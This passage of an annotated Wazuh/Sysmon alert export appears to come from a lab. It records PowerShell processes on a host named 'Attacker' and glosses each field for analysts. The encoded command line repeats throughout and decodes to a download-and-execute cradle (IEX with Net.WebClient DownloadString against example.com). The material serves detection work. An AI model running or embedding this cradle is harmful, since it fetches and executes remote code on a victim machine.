ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" Sysmon's rendered message text. The same fields are parsed into data.win.eventdata below; search on those, not on this free text.
data.win.eventdata.utcTime: 2025-04-24 22:34:42.701 When Sysmon observed the process start (UTC, ms). 2.2 s after its parent started (22:34:40.473 in record 281347).
data.win.eventdata.processGuid: {94294ddc-bc82-680a-730a-000000000e00} Sysmon's process GUID for the new process, unique even across PID reuse and reboots. Third generation of the chain: its parent is the process in record 281347.
data.win.eventdata.processId: 14400 Windows PID; reused after exit, so join on processGuid.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Full path of the started executable.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Version resource of the image; 10.0.26100 is the Windows 11 24H2 / Server 2025 build line.
data.win.eventdata.description: Windows PowerShell Version-resource description of the image.
data.win.eventdata.product: Microsoft® Windows® Operating System Version-resource product name.
data.win.eventdata.company: Microsoft Corporation Version-resource company name. Trivially forged in a rebuilt binary; trust the hash, not this.
data.win.eventdata.originalFileName: PowerShell.EXE Name compiled into the binary. Matches image here, as expected; a differently named image carrying this value is a renamed copy.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA Full command line, the same cradle as in records 281055 and 281347: the base64 is UTF-16LE script text that decodes to IEX(New-Object Net.WebClient).DownloadString('https://example.com/test'). The parent's command line in the message above is identical, so the payload is being re-run generation after generation.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ Working directory of the new process; the user's profile root.
data.win.eventdata.user: Attacker\\Attcker1 Account the process runs as (HOST\user).
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} Sysmon's identifier for the logon session. Same value as in every other event on this page: one session.
data.win.eventdata.logonId: 0x26584 Windows logon ID for that session; matches the Logon ID in the Security log's 4624 event, which gives logon type and source.
data.win.eventdata.terminalSessionId: 1 Windows session number; 1 is the first interactive desktop session (0 is services).
data.win.eventdata.integrityLevel: Medium Process integrity level. Medium = standard user, still not elevated three generations in.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bc80-680a-710a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 12900 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 12 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534208.853675 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:35:15.5626418Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 281711 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:35:15.537
ProcessGuid: {94294ddc-bca2-680a-8c0a-000000000e00}
ProcessId: 8152
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_rwqywtk0.t2z.ps1
CreationUtcTime: 2025-04-24 22:35:15.537
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:35:15.537 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bca2-680a-8c0a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 8152 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_rwqywtk0.t2z.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:35:15.537 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 11 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534208.856439 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:35:19.7921118Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 281758 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:35:18.662
ProcessGuid: {94294ddc-bca6-680a-900a-000000000e00}
ProcessId: 13940
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bca4-680a-8e0a-000000000e00}
ParentProcessId: 13604
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:35:18.662 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bca6-680a-900a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 13940 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bca4-680a-8e0a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 13604 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 13 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534208.864509 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:35:20.0085076Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 281759 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:35:19.991
ProcessGuid: {94294ddc-bca6-680a-900a-000000000e00}
ProcessId: 13940
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_if1icrzi.oi2.ps1
CreationUtcTime: 2025-04-24 22:35:19.989
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:35:19.991 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bca6-680a-900a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 13940 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_if1icrzi.oi2.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:35:19.989 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 14 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534208.867277 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:35:25.2990647Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 281809 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:35:25.289
ProcessGuid: {94294ddc-bcac-680a-950a-000000000e00}
ProcessId: 10760
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_umgehqh1.lii.ps1
CreationUtcTime: 2025-04-24 22:35:25.289
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:35:25.289 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcac-680a-950a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 10760 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_umgehqh1.lii.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:35:25.289 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 15 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534208.870045 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:35:27.3616052Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 281843 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:35:27.354
ProcessGuid: {94294ddc-bcad-680a-970a-000000000e00}
ProcessId: 9580
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_sqqlcpdl.oin.ps1
CreationUtcTime: 2025-04-24 22:35:27.354
User: Attacker\Attcker1" Full rendered text of the Sysmon event, as Event Viewer shows it. Every line in it is also available parsed under data.win.eventdata.*, so query those fields and use this one for reading.
data.win.eventdata.utcTime: 2025-04-24 22:35:27.354 Time Sysmon observed the file create (UTC). Use this, not systemTime, when building the timeline.
data.win.eventdata.processGuid: {94294ddc-bcad-680a-970a-000000000e00} Sysmon's unique ID for the creating process, derived from the machine GUID and the process start time. PIDs are reused after exit, GUIDs are not: pivot on this to pull every event for exactly this process. Its ProcessCreate event is not among the alerts on this page, so search for the GUID directly.
data.win.eventdata.processId: 9580 Windows PID of the process that created the file. Good for matching within a short window; prefer processGuid for joins.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Full path of the executable that created the file, here the built-in Windows PowerShell 5.1 engine in its expected location.
